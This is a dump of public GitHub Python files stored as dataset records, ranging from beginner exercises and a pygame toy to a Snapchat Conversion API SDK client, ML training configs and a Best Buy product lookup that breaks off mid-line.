print(\"MAIN SHAPE\" , main_slices)\n\n # c = lambda i : i self.tic:\n #print(\"updating\")\n #print(self.power)\n if self.light > 0:\n if (millis() - self.start) > self.tic*10000:\n self.light = 0\n else:\n self.light = self.light - .001\n else:\n self.power = self.power + 1\n if self.power > self.tic*12000:\n self.power = 0\n self.light = 1\n #print(self.name, millis() - self.start)\n self.start = millis()\n self.timer = millis()\n self.check_near(hexes)\n return\n\n def draw(self):\n #draw the base\n pygame.draw.polygon(windowSurface, self.color, self.all_verts)\n #draw the button to reset\n pygame.draw.polygon(windowSurface, self.button_color, self.button_verts)\n #draw the LEDS\n led_color = (0,int(255*self.light),0)\n for led in self.led_points:\n pygame.draw.circle(windowSurface, led_color, led, size//5, 0)\n return\n\n def handle_click(self, pos):\n if self.is_inside(pos, self.button_verts):\n self.power = 0\n self.light = 1\n self.timer = millis()\n self.start = millis()\n return\n\n def move_to(self, pos):\n self.pos = pos\n self.update_verts()\n\n def is_inside(self, pos, poly = None):\n if poly is None:\n poly = self.all_verts\n x = pos[0]\n y = pos[1]\n n = len(poly)\n inside = False\n\n p1x,p1y = poly[0]\n for i in range(n+1):\n p2x,p2y = poly[i % n]\n if y > min(p1y,p2y):\n if y <= max(p1y,p2y):\n if x <= max(p1x,p2x):\n if p1y != p2y:\n xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x\n if p1x == p2x or x <= xints:\n inside = not inside\n p1x,p1y = p2x,p2y\n\n return inside\n\n def check_near(self, hexes):\n radius = int(size*2)\n near = False\n for hex in hexes:\n if self.distance_between_points(self.pos, hex.pos) < radius and (self.name != hex.name):\n if hex.light > 0:\n self.power = self.power * (1+gain*hex.light)\n #print(self.name, \"gaining\")\n near = True\n if near:\n self.button_color = PINK\n else:\n self.button_color = WHITE\n\n def distance_between_points(self, pos1, pos2):\n x1 = pos1[0]\n y1 = pos1[1]\n x2 = pos2[0]\n y2 = pos2[1]\n return sqrt((x1-x2)**2 + (y1-y2)**2)\n\n\n\ndef millis():\n return time.time()*1000\n\n\n# set up pygame\npygame.init()\n\n# set up the window\nwindowSurface = pygame.display.set_mode((width, height), 0, 32)\npygame.display.set_caption('blinky-blinky')\n\n# draw the background onto the surface\nwindowSurface.fill(BLACK)\nheight_scalar = height//7\nwidth_scalar = width//7\nhex0 = Hex((2*width_scalar,1*height_scalar),0)\nhex1 = Hex((4*width_scalar,1*height_scalar),1)\nhex2 = Hex((2*width_scalar,3*height_scalar),2)\nhex3 = Hex((4*width_scalar,3*height_scalar),3)\nhex4 = Hex((2*width_scalar,5*height_scalar),4)\nhex5 = Hex((4*width_scalar,5*height_scalar),5)\n\nhexes = []\nhexes.append(hex0)\nhexes.append(hex1)\nhexes.append(hex2)\nhexes.append(hex3)\nhexes.append(hex4)\nhexes.append(hex5)\nmoving = -1\n\n# draw the window onto the screen\npygame.display.update()\n\n# run the game loop\nwhile True:\n windowSurface.fill(BLACK)\n for hex in hexes:\n hex.update(hexes)\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == SPACE:\n for i in range(len(hexes)):\n hexes[i].power = random.randint(0,int(hexes[i].tic*12000))\n if event.type == MOUSE_DOWN:\n pressed = True\n moving = -1\n for i in range(len(hexes)):\n inside = hexes[i].is_inside(event.pos)\n if inside:\n hexes[i].handle_click(event.pos)\n moving = i\n\n if event.type == MOUSE_UP:\n pressed = False\n moving = -1\n\n if event.type == MOUSE_MOVE and pressed:\n hexes[moving].move_to(event.pos)\n\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n for hex in hexes:\n hex.draw()\n pygame.display.update()\n\n# draw a circle onto the surface\n#pygame.draw.circle(windowSurface, BLUE, (300, 50), 20, 0)\n","repo_name":"hgmason/firefly","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28477734301","text":"def the_number_one(n):\n if n == 0:\n return True\n if n<=2:\n return False\n totalEven = 0\n totalOdd = 0\n for i in range(1, n+1):\n uocSo = n % i\n if uocSo == 0:\n print(i)\n if i % 2 == 0:\n totalEven += 1\n else:\n totalOdd += 1\n return totalEven == totalOdd\nprint(the_number_one(2))\n","repo_name":"luandnh/CodeLearnTraining.Python","sub_path":"the_number_one.py","file_name":"the_number_one.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10574571050","text":"#lists\nlucky_numbers = [4,8,15] #create list named lucky_numbers\nfriends = [\"john\", \"jake\", \"jim\"]\nfriends.extend(lucky_numbers) \nfriends.append(\"creed\")\nfriends.insert(1, \"kelley\")\n#friends.clear()\nfriends.pop()\n#friends.sort()\nprint(friends.index(\"john\"))\nfriends2 = friends.copy()\nprint(friends + friends2)\n","repo_name":"omarakamal/Teaching-Python","sub_path":"Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32599656210","text":"\"\"\"\nConversion API Client\n\"\"\"\nimport multiprocessing\nimport logging\nfrom snap_business_sdk.api.default_api import DefaultApi\nfrom snap_business_sdk.api_client import ApiClient, Configuration\nfrom snap_business_sdk.capi_utils import (\n is_empty_string,\n ErrorCallback\n)\n\nSDK_LANGAUGE = \"python\"\nSDK_VERSION = \"1.0.0\"\nAPI_VERSION = \"v2\"\n\n# headers\nHEADER_SDK_VERSION = \"X-CAPI-BusinessSDK\"\nHEADER_CAPI_PATH = \"X-CAPI-Path\"\n\n# user agent\nUSER_AGENT = \"BusinessSDK/Python/{sdk_version}\".format(sdk_version=SDK_VERSION)\nUSER_AGENT_WITH_PAD = \"{user_agent} (LaunchPAD)\".format(user_agent=USER_AGENT)\n\n# capi url\nPROD_URL = \"https://tr.snapchat.com/{api_version}\".format(api_version=API_VERSION)\nSTAGING_URL = \"https://tr-shadow.snapchat.com/{api_version}\".format(api_version=API_VERSION)\n\n# Add task to the set. This creates a strong reference.\nbackground_tasks = set()\n\n\nclass ConversionApi(object):\n logger = None\n\n def __init__(self, access_token=None, launchpad_url=None):\n self.configuration = Configuration(\n access_token=access_token,\n host=launchpad_url\n )\n\n self.api_client = ApiClient(self.configuration)\n # Set header\n # User-Agent: BusinessSDK/Python/{sdk-version}\n self.api_client.user_agent = USER_AGENT\n # X-CAPI-BusinessSDK: python/{sdk-version}\n self.api_client.set_default_header(\n HEADER_SDK_VERSION,\n '{sdk_language}/{sdk_version}'.format(sdk_language=SDK_LANGAUGE, sdk_version=SDK_VERSION))\n\n # Create default api instance\n self.default_api = DefaultApi(self.api_client)\n\n @classmethod\n def set_debug_mode(cls, enabled=False):\n # disable logging\n if not enabled:\n cls.logger = None\n return\n\n # set default basic logger\n logging.basicConfig(format='%(asctime)s %(levelname)s \\n%(message)s', datefmt='%H:%M:%S')\n cls.logger = logging.getLogger(__name__)\n cls.logger.setLevel(logging.INFO)\n\n @classmethod\n def log(cls, info):\n if cls.logger is not None:\n cls.logger.info(info)\n\n @classmethod\n def warn(cls, info):\n if cls.logger is not None:\n cls.logger.warn(info)\n\n @classmethod\n def error(cls, info):\n if cls.logger is not None:\n cls.logger.error(info)\n\n @classmethod\n def validate_and_create_events(cls, raw_events):\n # validate and convert raw events to capi events\n capi_events = list(map(lambda event: (None if event is None else event.getCapiEvent()), raw_events))\n # filter all events that are invalid (None)\n capi_events = list(filter(lambda event: event is not None, capi_events))\n return capi_events\n\n def logEvents(self, capi_events):\n ConversionApi.log(\n 'Host: {host} '\n '\\nAccess_token: {access_token} '\n '\\nHeaders: {headers} '\n '\\nConversion events: {events}'.format(\n host=self.default_api.api_client.configuration.host,\n access_token=self.default_api.api_client.configuration.access_token,\n headers=self.default_api.api_client.default_headers,\n events=capi_events\n )\n )\n\n def send_test_event(self, raw_event):\n return self.send_test_events([raw_event])\n\n def send_test_events(self, raw_events):\n if raw_events is None:\n resp = ErrorCallback('Conversion event cannot be empty')\n ConversionApi.error('Send Test Exception: {message}'.format(message=resp.get()))\n return resp\n\n # validate event attributes\n capi_events = self.validate_and_create_events(raw_events)\n\n # log events\n self.logEvents(capi_events)\n\n try:\n resp = self.default_api.send_test_data(body=capi_events)\n ConversionApi.log('Send Test Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Send Test Exception: {message}'.format(message=e.__str__()))\n\n return resp\n\n def get_test_event_logs(self, asset_id):\n try:\n resp = self.default_api.conversion_validate_logs(asset_id=asset_id)\n ConversionApi.log('Get Test Logs Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Get Test Logs Exception: {message}'.format(message=e.__str__()))\n return resp\n\n def get_test_event_stats(self, asset_id):\n try:\n resp = self.default_api.conversion_validate_stats(asset_id=asset_id)\n ConversionApi.log('Get Test Stats Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Get Test Stats Exception: {message}'.format(message=e.__str__()))\n return resp\n\n # send single event in synchronous mode\n def send_event_sync(self, raw_event):\n return self.send_events_sync([raw_event])\n\n # send multiple events in synchronous mode\n def send_events_sync(self, raw_events):\n return self.send_events(raw_events, async_req=False)\n\n # send single event in asynchronous mode\n def send_event(self, raw_event):\n return self.send_events([raw_event])\n\n # send multiple events in asynchronous mode\n def send_events(self, raw_events, async_req=True):\n if raw_events is None:\n resp = ErrorCallback('Conversion event cannot be empty')\n ConversionApi.error('Exception: {message}'.format(message=resp.get()))\n return resp\n\n # validate event attributes\n capi_events = self.validate_and_create_events(raw_events)\n\n # log events\n self.logEvents(capi_events)\n\n try:\n resp = self.default_api.send_data(body=capi_events, async_req=async_req)\n ConversionApi.log('Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Exception: {message}'.format(message=e.__str__()))\n return resp\n\n","repo_name":"Snapchat/business-sdk-python","sub_path":"snap_business_sdk/public/conversion_api.py","file_name":"conversion_api.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"12949647368","text":"\nfrom jinja2 import Environment, PackageLoader, select_autoescape\n\nenv = Environment(\n loader=PackageLoader('jinja2Demo', 'templates'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n\ntemplate1 = env.get_template('mytemplate.html')\nusers1=[{'name':'John'},{'name':'Tom', 'hidden':True},{'name':'Lisa'},{'name':'Bob'}]\nusers2=['li', 'zhang', 'zhong', 'zhou']\nhtml1 = template1.render(a_variable='a_variable', name='apktool', users=users1,\n users2 = users2)\n\ntemplate2 = env.get_template('child.html')\nhtml2 = template2.render()\n\nprint(html1)\n","repo_name":"apktool/LearnPython","sub_path":"9.04.01.py","file_name":"9.04.01.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45744906108","text":"from typing import List\n\nclass Node:\n def __init__(self, value, left_child: 'Node' = None, right_child: 'Node' = None):\n self.value = value\n self.left_node = left_child\n self.right_node = right_child\n\n\nclass Solution:\n def find_path_where_sum_is_k(self, node: Node, k: int, result: List = []):\n if not node:\n return False\n temp_result = result.copy()\n temp_result.append(node.value)\n if node.value == k and not node.left_node and not node.right_node:\n print(\"Path: {}\".format(temp_result))\n return True\n if node.value > k: # no need to traverse further\n return False\n return self.find_path_where_sum_is_k(node.left_node, k - node.value, temp_result) or \\\n self.find_path_where_sum_is_k(node.right_node, k - node.value, temp_result)\n\n def find_all_paths_where_sum_is_k(self, node: Node, k: int, result: List = []):\n if not node:\n return\n temp_result = result.copy()\n temp_result.append(node.value)\n if node.value == k and not node.left_node and not node.right_node:\n print(\"Path: {}\".format(temp_result))\n return\n if node.value > k:\n return\n self.find_all_paths_where_sum_is_k(node.left_node, k - node.value, temp_result)\n self.find_all_paths_where_sum_is_k(node.right_node, k - node.value, temp_result)\n\n\nsample_tree = Node(1, Node(2, Node(4), Node(5)), Node(3, Node(4), Node(6)))\ntarget_sum = 8\nsol = Solution()\nprint(\"Finding the first path whose sum is equal to {}\".format(target_sum))\nprint(sol.find_path_where_sum_is_k(sample_tree, target_sum))\n\nprint(\"Finding all paths whose sum is equal to {}\".format(target_sum))\nsol.find_all_paths_where_sum_is_k(sample_tree, target_sum)\n","repo_name":"arvindrocky/dataStructures","sub_path":"trees/find_path_where_sum_is_k.py","file_name":"find_path_where_sum_is_k.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18878837839","text":"from os import name\r\nfrom django.urls import path\r\nfrom .views import TaskDetailView, TaskListView, TaskCreateView, TaskUpdateView, TaskDeleteView, TaskIndexView, TaskMainView\r\n\r\nurlpatterns = [\r\n path('', TaskIndexView.as_view(), name=\"index\"),\r\n path('task_list/', TaskListView.as_view(), name=\"list\"),\r\n path('task_list/main', TaskMainView.as_view(), name=\"main\"),\r\n # pkは受け取ったint値を変数として格納→templateで扱えるように\r\n path('task_list/', TaskDetailView.as_view(), name=\"detail\"),\r\n path('task_list/create/', TaskCreateView.as_view(), name=\"create\"),\r\n path('task_list//update', TaskUpdateView.as_view(), name=\"update\"),\r\n path('task_list//delete', TaskDeleteView.as_view(), name=\"delete\"),\r\n]\r\n","repo_name":"Kanata0204/task_app","sub_path":"taskapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22837592406","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom typing import List\n\n\ndef scatter_3d(axes: List[str], data: pd.DataFrame, show=True):\n \"\"\"Plot 3D data.\n\n Plot 3D data\n\n :param axes:\n List of axes labels in the input DataFrame (i.e. column names). If no axes\n are provided, the first 3 columns of the input DataFrame will automatically be used.\n :param data: 3D data in a pandas DataFrame.\n :param show: Set to display graph.\n \"\"\"\n\n if axes == None:\n axes = data.columns.tolist()\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n x = data[axes[0]]\n y = data[axes[1]]\n z = data[axes[2]]\n ax.scatter(x, y, z, c=z)\n ax.set_xlabel(axes[0])\n ax.set_ylabel(axes[1])\n ax.set_zlabel(axes[2])\n\n if show:\n plt.show()\n","repo_name":"elevans/tooled","sub_path":"src/tooled/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74316357868","text":"from judgeUtil import chairSynonymsEn\r\nfrom judgeUtil import tableSynonymsEn\r\nfrom judgeUtil import indexToWord\r\nfrom judgeUtil import obtainAndEntities\r\nfrom judgeUtil import printEntities\r\nfrom judgeUtil import extractEntities, extractPeopleNumber\r\nfrom util import convertWordsToNumber\r\nimport math\r\n\r\nlowestChairCountPerTable = 4\r\ncircleSynonymsEn = [\"circle\", \"lap\", \"ring\"]\r\ngroupSynonymsEn = [\"group\", \"set\"]\r\ndefaultTableCount = 5\r\n\r\nclass JudgeBanquet:\r\n def __init__(self, sentences, s_ch, s_en, conjAnd, posTag, relationships, commands):\r\n self.commands = commands\r\n self.posTag = posTag\r\n self.relationships = relationships\r\n self.wordIndex = indexToWord(s_en)\r\n self.entities, self.noEntities = extractEntities(sentences, self.wordIndex)\r\n self.andEntities = self._extractConjAnd(conjAnd)\r\n self._modifyEntities()\r\n self.s_ch = s_ch\r\n self.s_en = s_en\r\n self.people_number = extractPeopleNumber(self.wordIndex, self.entities, self.relationships)\r\n\r\n def process(self):\r\n table_number = self.extractTableNumber()\r\n half_circle_table = self.whetherEachTableHalfCircleChair()\r\n if self.people_number <= 0:\r\n self.people_number = self.calculatePeopleNumber(table_number,half_circle_table)\r\n return table_number, half_circle_table, self.people_number\r\n\r\n def calculatePeopleNumber(self, table_number, half_circle_table):\r\n if table_number > 0:\r\n if half_circle_table:\r\n return table_number * 3\r\n else:\r\n return table_number * 6\r\n else:\r\n return 25\r\n\r\n def _extractConjAnd(self, conjAnd):\r\n andEntites = obtainAndEntities(conjAnd, self.entities)\r\n print(andEntites)\r\n return andEntites\r\n\r\n def _modifyEntities(self):\r\n # TODO 六张桌子和椅子\r\n printEntities(self.entities)\r\n\r\n def extractTableNumber(self):\r\n tableCount = -1\r\n chairCount = -1\r\n for k in self.entities.keys():\r\n for table in tableSynonymsEn + groupSynonymsEn:\r\n if table in k:\r\n if \"count\" in self.entities[k].keys():\r\n try:\r\n count = convertWordsToNumber(self.entities[k][\"count\"])\r\n if count > 1 and count > tableCount:\r\n tableCount = count\r\n except Exception as e:\r\n pass\r\n for chair in chairSynonymsEn:\r\n if chair in k:\r\n if \"count\" in self.entities[k].keys():\r\n try:\r\n count = convertWordsToNumber(self.entities[k][\"count\"])\r\n if count > 1 and count > chairCount:\r\n chairCount = count\r\n except Exception as e:\r\n pass\r\n if tableCount != -1:\r\n if chairCount != -1:\r\n if self.people_number <= 0 and chairCount < 20:\r\n self.people_number = tableCount * chairCount\r\n return tableCount\r\n if chairCount != -1 and chairCount >= lowestChairCountPerTable and chairCount < 20:\r\n print(\"chairCount:\",chairCount)\r\n self.people_number = defaultTableCount * chairCount\r\n return defaultTableCount\r\n return -1\r\n\r\n def whetherEachTableHalfCircleChair(self):\r\n for k in self.entities.keys():\r\n for circle in circleSynonymsEn:\r\n if circle in k:\r\n if \"half\" in self.entities[k][\"attributes\"] or \"half\" in self.entities[k][\"determiners\"]:\r\n for chair in chairSynonymsEn:\r\n if (\"of:\"+chair) in self.entities[k][\"relationships\"]:\r\n return True\r\n # False代表没说,不代表不一定……按照默认来\r\n return False\r\n\r\n# if __name__==\"__main__\":\r\n# # sentences = [\"由若干组桌椅组成,12张椅子围着一个桌子\",\r\n# # \"布局由好几个桌椅围成的小圈组成,每个小圈由6张桌椅组成\",\r\n# # \"好几组环形布局的桌椅,每组6个座位\",\r\n# # \"若干张梯形课桌拼成六边形,每个边有一把椅子,大房间内有多个六边形\",\r\n# # \"每六个桌子成一组,围成一个六边形,房间内多组桌子错落排放,每组桌子的一条边上放置一张椅子\",\r\n# # \"整个会议室分为五组桌椅,每组桌椅是由梯形单人桌围城的六边形大桌,周围有六把椅子\",\r\n# # \"四张桌子纵向面向屏幕,摆放两行,每行两张。每张桌子两侧各三张椅子。\",\r\n# # \"四张椅子围绕着一张小桌子,一共有多组这样的桌椅组合布满整个房间。\",\r\n# # \"五列圆桌,每个圆桌围绕半圈椅子,椅子都朝向正前方。\",\r\n# # \"几十张圆桌均匀分布,每张桌子上10个座位\",\r\n# # \"房间内有很多圆桌,每张圆桌周围放约8张椅子\",\r\n# # \"有很多圆形的桌子,每个桌子周围带有十把椅子\",\r\n# # \"有五张长方形桌子,彼此分开,不靠近。每个桌子四周围绕着五个椅子。\",\r\n# # \"四组长桌椅分布在会议室的两侧,每侧各两组,每张长桌对应五把椅子\",\r\n# # \"以小桌形式,一张桌子周围配置六个椅子\"]\r\n# sentences = [\"整个会议室分为五组桌椅,每组桌椅是由梯形单人桌围城的六边形大桌,周围有六把椅子\",\r\n# \"四组长桌椅分布在会议室的两侧,每侧各两组,每张长桌对应五把椅子\"]\r\n# for s in sentences:\r\n# sentences, s_ch, s_en, conjAnd, posTag = processInputEnglish(s)\r\n# judge = JudgeBanquet(sentences, s_ch, s_en, conjAnd, 30)\r\n# print(judge.extractTableNumber())\r\n# print(judge.whetherEachTableHalfCircleChair())\r\n# print(\"=========================\")\r\n\r\n","repo_name":"monianshouhou/3DMeetingRoomGeneration","sub_path":"judgeBanquet.py","file_name":"judgeBanquet.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40808880006","text":"import json\r\n# from pprint import pprint\r\nf=open(\"task4s.json\",\"r\")\r\nmovie_list=json.load(f)\r\ng_movie,top_movie=0,[]\r\ndef scrape_movie_details():\r\n g_movie=0\r\n for i in movie_list:\r\n top_movie.append(i)\r\n if g_movie==10:\r\n break\r\n g_movie+=1\r\n file=open(\"task5s.json\",\"w\")\r\n json.dump(top_movie,file,indent=4)\r\n file.close()\r\n return top_movie\r\nprint(scrape_movie_details())","repo_name":"pawankumar2255/IMDB-Scrap","sub_path":"imdb5.py","file_name":"imdb5.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74035643948","text":"\"\"\"Configuration settings for train_dagger, training DAgger from synthetic demos.\"\"\"\n\nimport sacred\nimport torch as th\n\nfrom imitation.scripts.ingredients import demonstrations as demos_common\nfrom imitation.scripts.ingredients import environment, expert\nfrom imitation.scripts.ingredients import logging as logging_ingredient\nfrom imitation.scripts.ingredients import train\n\ntrain_imitation_ex = sacred.Experiment(\n \"train_imitation\",\n ingredients=[\n logging_ingredient.logging_ingredient,\n demos_common.demonstrations_ingredient,\n train.train_ingredient,\n expert.expert_ingredient,\n environment.environment_ingredient,\n ],\n)\n\n\n@train_imitation_ex.config\ndef config():\n bc_kwargs = dict(\n batch_size=32,\n l2_weight=3e-5, # L2 regularization weight\n optimizer_cls=th.optim.Adam,\n optimizer_kwargs=dict(\n lr=4e-4,\n ),\n )\n bc_train_kwargs = dict(\n n_epochs=None, # Number of BC epochs per DAgger training round\n n_batches=None, # Number of BC batches per DAgger training round\n log_interval=500, # Number of updates between Tensorboard/stdout logs\n )\n dagger = dict(\n use_offline_rollouts=False, # warm-start policy with BC from offline demos\n total_timesteps=1e5,\n )\n agent_path = None # Path to load agent from, optional.\n\n\n@train_imitation_ex.named_config\ndef mountain_car():\n environment = dict(gym_id=\"MountainCar-v0\")\n bc_kwargs = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_mountain_car():\n environment = dict(gym_id=\"seals/MountainCar-v0\")\n bc_kwargs = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef cartpole():\n environment = dict(gym_id=\"CartPole-v1\")\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_cartpole():\n environment = dict(gym_id=\"seals/CartPole-v0\")\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef pendulum():\n environment = dict(gym_id=\"Pendulum-v1\")\n\n\n@train_imitation_ex.named_config\ndef ant():\n environment = dict(gym_id=\"Ant-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_ant():\n environment = dict(gym_id=\"seals/Ant-v0\")\n\n\n@train_imitation_ex.named_config\ndef half_cheetah():\n environment = dict(gym_id=\"HalfCheetah-v2\")\n bc_kwargs = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef seals_half_cheetah():\n environment = dict(gym_id=\"seals/HalfCheetah-v0\")\n bc_kwargs = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef humanoid():\n environment = dict(gym_id=\"Humanoid-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_humanoid():\n environment = dict(gym_id=\"seals/Humanoid-v0\")\n\n\n@train_imitation_ex.named_config\ndef fast():\n dagger = dict(total_timesteps=50)\n bc_train_kwargs = dict(n_batches=50)\n","repo_name":"frapercan/imitation-learning","sub_path":"src/imitation/scripts/config/train_imitation.py","file_name":"train_imitation.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17552729703","text":"# Binary to decimal\n# Given a binary number as an integer N, convert it into decimal and print.\n\nn = int(input())\n\npv = 0\n# c = 1\nans = 0\ntemp = n\nwhile(temp!=0):\n d = n%10 \n temp = int(temp/10)\n c = 2**pv\n ans = ans + (d*c)\n pv+=1\n\nprint(ans) ","repo_name":"jaychovatiya4995/python_codingwithNinjas","sub_path":"More Loop/Binarytodecimal.py","file_name":"Binarytodecimal.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8395574371","text":"import matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom bokeh.plotting import figure\n\n\ndef matplotlib_multiple_axes_figures(total_plot_count=3, data=[1, 2, 3]):\n \"\"\"Helper generator which create a figure containing up to `total_plot_count`\n axes and optionally adds `data` to each axes in a permutation-style loop.\n \"\"\"\n for num_plots in range(1, total_plot_count + 1):\n for permutation in range(2**num_plots):\n has_data = [permutation & (1 << i) > 0 for i in range(num_plots)]\n fig, ax = plt.subplots(num_plots)\n if num_plots == 1:\n if has_data[0]:\n ax.plot(data)\n else:\n for plot_id in range(num_plots):\n if has_data[plot_id]:\n ax[plot_id].plot(data)\n yield fig\n plt.close()\n\n\ndef matplotlib_with_image():\n \"\"\"Create a matplotlib figure with an image\"\"\"\n fig, ax = plt.subplots(3)\n ax[0].plot([1, 2, 3])\n ax[1].imshow(np.random.rand(200, 200, 3))\n ax[2].plot([1, 2, 3])\n return fig\n\n\ndef matplotlib_without_image():\n \"\"\"Create a matplotlib figure without an image\"\"\"\n fig, ax = plt.subplots(2)\n ax[0].plot([1, 2, 3])\n ax[1].plot([1, 2, 3])\n return fig\n\n\ndef bokeh_plot():\n # from https://docs.bokeh.org/en/latest/docs/user_guide/quickstart.html\n # prepare some data\n x = [1, 2, 3, 4, 5]\n y = [6, 7, 2, 4, 5]\n\n # create a new plot with a title and axis labels\n p = figure(title=\"simple line example\", x_axis_label=\"x\", y_axis_label=\"y\")\n\n # add a line renderer with legend and line thickness\n p.line(x, y, legend_label=\"Temp.\", line_width=2)\n\n return p\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests_old/utils/dummy_data.py","file_name":"dummy_data.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"26189284052","text":"import sys\nimport zipfile\nimport xml.etree.ElementTree as ET\nfrom html.parser import HTMLParser\n\nclass HtmlParser(HTMLParser):\n \"\"\"Parse urls.\"\"\"\n def __init__(self):\n HTMLParser.__init__(self)\n self.rem = '[]\\r\\n\\t 0123456789'\n self.body = False\n self.get_data = False\n self.noscript = True\n self.text = []\n\n def handle_starttag(self, tag, attrs):\n if tag == 'body':\n self.body = True\n if tag == 'script':\n self.noscript = False\n if tag == 'p':\n self.get_data = True\n\n def handle_endtag(self, tag):\n if tag == 'body':\n self.body = False\n if tag == 'script':\n self.noscript = True\n if tag == 'p':\n self.get_data = False\n\n def handle_data(self, data):\n if self.body and self.get_data and self.noscript and data.strip(self.rem):\n self.text.append(data)\n\ndef doc_reader(infile):\n \"\"\"Parse docx and odf files.\"\"\"\n if infile.endswith('.docx'):\n docid = 'word/document.xml'\n else:\n docid = 'content.xml'\n try:\n zfile = zipfile.ZipFile(infile)\n except:\n print('Sorry, can\\'t open {}.'.format(infile))\n return\n body = ET.fromstring(zfile.read(docid))\n text = '\\n'.join([et.text.strip() for et in body.iter() if et.text])\n return text\n","repo_name":"riverrun/drat","sub_path":"drat/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"20642899482","text":"\"\"\"\n Public key HEX\n\n\"\"\"\n\nfrom .public_key_base import PublicKeyBase, PUBLIC_KEY_STORE_TYPE_HEX\n\nAUTHENTICATION_TYPE_HEX = 'HexVerificationKey'\nPUBLIC_KEY_TYPE_HEX = 'PublicKeyHex'\n\n\nclass PublicKeyHex(PublicKeyBase):\n \"\"\"Encode key value using Hex\"\"\"\n\n def __init__(self, key_id, **kwargs):\n PublicKeyBase.__init__(self, key_id, **kwargs)\n self._type = PUBLIC_KEY_TYPE_HEX\n self._store_type = PUBLIC_KEY_STORE_TYPE_HEX\n\n def get_authentication_type(self):\n \"\"\"return the type of authentication supported by this class\"\"\"\n return AUTHENTICATION_TYPE_HEX\n","repo_name":"OutlierVentures/H2O","sub_path":"backend/squid_py/ddo/public_key_hex.py","file_name":"public_key_hex.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"23988086647","text":"from application.bbwrapper import session\nimport requests\nimport shutil\nimport json\nimport re\nimport os\n\n\nclass ProductInfo:\n def __init__(self, url=None, sku=None):\n if sku is None and url is None:\n raise ValueError(\n \"Must provide either a product url or product sku\")\n elif sku is None and url is not None:\n self.sku = self.get_product_sku(url)\n else:\n self.url = url\n self.sku = sku\n # self.name = None\n # self.price = None\n # self.is_available = None\n # self.image_url = None\n\n def get_product_sku(self, url):\n domain_regex = re.compile(r'skuId=(\\d{7})', re.IGNORECASE)\n mo = domain_regex.search(url)\n if mo:\n return mo.groups()[0]\n else:\n raise ValueError(\n \"Could not find the product SKU in the provided URL.\")\n\n def set_primary_info(self):\n path = f\"https://api.bestbuy.com/v1/products(sku={self.sku})?sort=salePrice.asc&show=salePrice,onlineAvailability,name,image,url&format=json\"\n try:\n res = session.get(path)\n self.price, self.is_available, self.name, self.image_url, self.page_url = res.json()[\"products\"][0].values()\n except:\n raise requests.RequestException(res.status_code)\n\n def save_product_image(self):\n script_dir = os.path.dirname(os.path.realpath('__file__'))\n rel_path = 